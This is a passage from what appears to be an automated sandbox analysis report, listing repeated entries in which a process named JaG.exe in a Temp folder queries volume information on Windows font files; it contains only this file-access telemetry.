Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
